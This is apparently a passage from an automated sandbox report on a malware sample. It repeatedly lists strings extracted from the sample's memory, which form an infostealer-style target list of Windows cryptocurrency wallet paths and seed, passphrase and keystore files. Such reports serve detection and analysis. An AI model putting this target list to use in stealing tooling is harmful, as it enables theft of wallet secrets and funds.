Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: file.exe, 00000000.00000002.1975584108.0000000000FA4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\.es
Source: file.exe, 00000000.00000002.1975584108.0000000000FA4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: file.exe, 00000000.00000002.1975584108.0000000000FA4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: file.exe, 00000000.00000002.1975584108.0000000000FA4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: file.exe, 00000000.00000002.1975584108.0000000000FA4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: file.exe, 00000000.00000002.1975584108.0000000000FA4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: file.exe, 00000000.00000002.1975584108.0000000000FA4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: file.exe, 00000000.00000002.1975584108.0000000000FA4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: file.exe, 00000000.00000002.1975584108.0000000000FA4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: file.exe, 00000000.00000002.1975584108.0000000000FA4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: file.exe, 00000000.00000002.1975584108.0000000000FA4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: file.exe, 00000000.00000002.1975584108.0000000000FA4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron 